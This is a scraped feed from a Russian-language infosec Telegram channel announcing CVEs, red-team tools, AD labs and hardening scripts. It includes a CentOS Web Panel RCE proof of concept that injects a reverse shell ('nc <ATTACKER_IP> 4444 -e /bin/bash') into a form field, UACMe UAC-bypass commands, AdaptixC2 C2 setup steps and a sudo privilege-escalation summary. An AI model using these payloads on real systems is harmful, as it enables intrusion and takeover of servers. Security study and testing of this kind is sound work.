Whitehat Lab
1.93K subscribers
339 photos
390 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
Forwarded from GigaHackers (Oleg Labyntsev)
[LPE Linux CVE-2025-32643]

Всем привет! 👋

На днях вышла информация об уязвимости CVE-2025-32643. Баг позволяет в результате манипуляции опцией sudo -R (--chroot) повысить привилегии до root. 🚨

Нам удалось подтвердить PoC в нескольких версиях sudo.
1️⃣ На первом рисунке можете увидеть, что версия 1.9.14p2 подвержена уязвимости. Сначала от непривилегированного пользователя не могли смотреть каталог /root, а после эксплуатации спокойно смогли перечислить содержимое;

2️⃣ Аналогично на втором рисунке версия sudo 1.9.15p2 также подвержена уязвимости;

3️⃣А вот на третьем рисунке видно, что версия sudo 1.9.13p3 не подвержена недостатку, так как до версии 1.9.14 необходимой функциональности не было.

Подвержены версии sudo 1.9.14 - 1.9.17.
Для устранения недостатка достаточно обновить версию sudo до 1.9.17.p1
Подробнее о ресерче и приложенном PoC-е можно почитать здесь

#linux #pentest #LPE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 Kerbtool v0.1.1

Еще одна утилита для работы с Kerberos. Написана на🖼️ Go

--ask-tgt
--ask-st
--forge
--parse
--convert
--kerberoast


💻 Repo

#kerberos #ad #redteam #soft #golang

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
🔄💻 ADACLScanner v8.6

Инструмент для аудита разрешений в 💻 Active Directory, которые предоставлены через списки управления
доступом (ACL – Access Control List)

UPD
Added info for Windows 2022 and Windows 2025
Added Exchange Schema version 'Exchange Server 2019 CU10


Написан на 💻 PowerShell

SACL - список используемый для аудита доступа к данному объекту.
DACL - список указывающий права пользователей и групп на действия с данным объектом.

Разрешения, которые нам интересны 👍:

GenericAll - полные права на объект
GenericWrite - редактировать атрибуты объекта
WriteOwner - изменить владельца объекта
WriteDACL - редактировать ACE объекта
AllExtendedRights - расширенные права на объект
ForceChangePassword - сменить пароль объекта
Self - возможность добавить себя в группу


Работает в GUI или консольном режимах:

Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/canix1/ADACLScanner/refs/heads/master/ADACLScan.ps1' -OutFile ADACLScan.ps1

.\ADACLScan.ps1

.\ADACLScan.ps1 -Base (Get-ADRootDSE).defaultNamingContext -Owner -Scope subtree -Filter '(objectClass=*)' | Where-Object {$_.Access -eq 'Owner'}


Экспорт в xls, csv, html
Большое количество возможностей

💻 Home
😉 Active Directory ACL investigation
😉 Take Control Over AD Permissions

#adaclscanner #powershell #redteam #soft

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
1
🖥 Play with Docker

В поисках полезной информации нашел интересные площадки для DevOps

Это полностью бесплатные интерактивные платформы для тестирования и обучения 🖼️ Docker и 🖼️ Kubernetes
Есть теория и различные практические задания

🔗 Play with Docker
🔗 Play with Kubernetes
✍️ Training Docker
✍️ Training Kubernetes
💻 Repo

#docker #kubernetes #devops

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🛡 CVE-2025-48703 - RCE in CentOS Web Panel File Manager module

RCE уязвимость приложения для управления серверами CentOS Web Panel
Проблема в функции acc=changePerm, где не производится должная проверка входных данных, что позволяет выполнить произвольный код в параметре t_total

❗️ Эту атаку можно выполнить с минимальной аутентификацией или в некоторых конфигурациях, с не аутентифицированным доступом.


🔗 Research

PoC:

curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
--data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'


💻 Scanner

#cve #poc #centoswebpanel #web

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
4
🔄🔺 Dalfox 2.12.0

Мощный инструмент для поиска и обнаружения XSS уязвимостей. Написан на 🖼️ Go

UPD. 2.12

Установка:

go install github.com/hahwul/dalfox/v2@latest


Пример:

dalfox url http://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff -b https://your-callback-url


💻 Home
🔠 Wiki

#soft #dalfox #golang #xss

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥️ Cursor Directory

Вайб кодерам посвящается

The home for Cursor enthusiasts where you can explore and generate rules, browse MCPs, post and follow the latest news on the board, learn, connect, and discover jobs all in one place


🔗 https://cursor.directory

#cursor #coding #vibe

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
https://vulnbank.org

Намеренно уязвимое веб-приложение для отработки тестирования безопасности веб-приложений, API и LLM, безопасного обзора кода и внедрения безопасности в конвейеры CI/CD.

Vulnbank представляет собой банковское приложение с заложенными уязвимостями. Он призван помочь инженерам по безопасности, разработчикам, стажерам, аналитикам QA и специалистам DevSecOps узнать о:

- Распространенных уязвимостях веб-приложений и API;
- Уязвимостях AI/LLM;
- Безопасных методах разработки;
- Автоматизации тестирования безопасности;
- Реализация DevSecOps.

⚠️ ВНИМАНИЕ: Это приложение намеренно уязвимо и должно использоваться только в образовательных целях в изолированных средах.

https://github.com/Commando-X/vuln-bank
🔥3
💻LEHACK FREE Workshop 2024 (Active Directory Lab)

Еще одна AD лаба от авторов NetExec с доступными райтапами, подойдет новичкам для изучения основных техник, неплохая история для тех, кто хочет вкатиться в изучение AD

Главная цель - стать доменным администратором
После окончания установки перезагрузить все машины, дабы выкинуть из памяти (lsass) лишние пароли

Originally featured in the LeHack2024 Workshop, this lab is now available for free to everyone! In this lab, you’ll explore how to use the powerful tool NetExec to efficiently compromise an Active Directory domain during an internal pentest


💻 LeHack
🔗 Writeup 1
🔗 Writeup 2

#windows #lab #ad

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21
🖥️ Windows 10/11 Hardening Script

💻 Windows скрипт для внесения различных изменений в систему (отключение SMBv1, LLMNR, NetBIOS over TCP/IP, Enforce NTLMv2 auth, Force SMB signing и т.д.)

💻 Repo

#hardening #windows #powershell

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
11
🔲 Machine Learning

Полезные площадки для тех, кому интересна разработка в области ML
Есть задания в формате вопрос ответ, а также на написание кода различной степени сложности

➡️ Tensorgym
➡️ Deep-Ml
➡️ NeetCode

#ml #coding #tensorgym #deepml #neetcode

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
😎 PHDays

Выложили фотки с прошедшего @PHDays

🔗 Photos

#event #standoff #PHDays

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
😁3
💻 Curlify | Curlconverter

Одна полезная библиотека и один полезный сервис

Curlify
- преобразует запрос 💻 Python requests в curl команду

Установка:

pip install curlify


Пример:

import curlify
import requests

response = requests.get("http://google.ru")
print(curlify.to_curl(response.request))
# curl -X 'GET' -H 'Accept: */*' -H 'Accept-Encoding: gzip, deflate' -H 'Connection: keep-alive' -H 'User-Agent: python-requests/2.18.4' 'http://www.google.ru/'

print(curlify.to_curl(response.request, compressed=True))
# curl -X 'GET' -H 'Accept: */*' -H 'Accept-Encoding: gzip, deflate' -H 'Connection: keep-alive' -H 'User-Agent: python-requests/2.18.4' --compressed 'http://www.google.ru/'


Curlconverter - сделает наоборот, превратит вашу curl команду в код на множестве ЯП

curl "https://example.com/" -u "some_username:some_password"


$username = "some_username"
$password = ConvertTo-SecureString "some_password" -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential($username, $password)
$response = Invoke-RestMethod -Uri "https://example.com/" -Credential $credential -Authentication Basic


💻 Curlify
🔗 Curl to code

#curl #converter #curlify

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥42
🦎🔄 AdaptixC2 v0.6

Обзоры

UPD 0.6:

😉 Обновленная консоль агента с гибкими настройками
😉 Оповещения в Telegram
😉 OTP для синхронизации файлов и команд
😉 Новая тема Dracula
😉 Обновление до Golang 1.24.4


⭐️Возможности:

Server/Client Architecture for Multiplayer Support
Cross-platform GUI client
Fully encrypted communications
Listener and Agents as Plugin (Extender)
Client extensibility for adding new tools
Task and Jobs storage
Files and Process browsers
Socks4 / Socks5 / Socks5 Auth support
Local and Reverse port forwarding support
BOF support
Linking Agents and Sessions Graph
Agents Health Checker
Agents KillDate and WorkingTime control
Windows/Linux/MacOs agents support
Remote Terminal


⚙️Установка/Запуск 💻:

sudo apt install mingw-w64 make

wget https://go.dev/dl/go1.24.4.linux-amd64.tar.gz -O /tmp/go1.24.4.linux-amd64.tar.gz
sudo rm -rf /usr/local/go /usr/local/bin/go
sudo tar -C /usr/local -xzf /tmp/go1.24.4.linux-amd64.tar.gz
sudo ln -s /usr/local/go/bin/go /usr/local/bin/go

sudo apt install gcc g++ build-essential cmake libssl-dev qt6-base-dev qt6-websockets-dev qt6-declarative-dev

git clone https://github.com/Adaptix-Framework/AdaptixC2.git
cd AdaptixC2
make server
make extenders
make client
cd dist
chmod +x ssl_gen.sh
./ssl_gen.sh

./adaptixserver -profile profile.json
./AdaptixClient


💻 Rep
💻 Extension-Kit
📔 Docs
✈️ Channel
✈️ Group

#adaptixc2 #redteam #soft

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍1🔥1
📰 Полезные посты за эту неделю

🖼️😉 Площадки для DevOps

🛡😉 CVE-2025-48703 - RCE in CentOS Web Panel

🖥️😉 Cursor Directory

🖥️😉 Mass‑scanner for CitrixBleed 2 (CVE‑2025‑5777)

💻😉 LEHACK FREE Workshop 2024 (Active Directory Lab)

💻😉 Windows 10/11 Hardening Script

🦠😉 Подборка материалов по атакам на EDR

💻😉 Одна полезная библиотека и один полезный сервис

🦎😉 AdaptixC2 v0.6

#digest #useful #posts

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
3👍1
🛡️ UACMe v3.6.9

Различные техники обхода 🛡 UAC

Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor. This project demonstrates various UAC bypass techniques and serves as an educational resource for understanding Windows security mechanisms.


Использование:

akagi32.exe [Method_Number] [Optional_Command]
akagi64.exe [Method_Number] [Optional_Command]

akagi32.exe 23
akagi64.exe 61
akagi32.exe 23 c:\windows\system32\calc.exe
akagi64.exe 61 c:\windows\system32\charmap.exe


Собирать в 💻 Visual Studio 2019+

💻 Repo

#windows #uac #redteam

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5🤷1
💻 Magika

Определение типа файлов по содержимому

Готовые бинарники:

curl --proto '=https' --tlsv1.2 -LsSf https://github.com/google/magika/releases/download/cli/v0.1.3/magika-installer.sh | sh


powershell -ExecutionPolicy Bypass -c "irm https://github.com/google/magika/releases/download/cli/v0.1.3/magika-installer.ps1 | iex"


Также работает в качестве 😰 Python библиотеки

Установка:

pip install magika


from magika import Magika
m = Magika()
res = m.identify_path('./tests_data/basic/ini/doc.ini')
print(res.output.label)
// ini


💻 Repo
🔗 Home

#magika #file #content

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3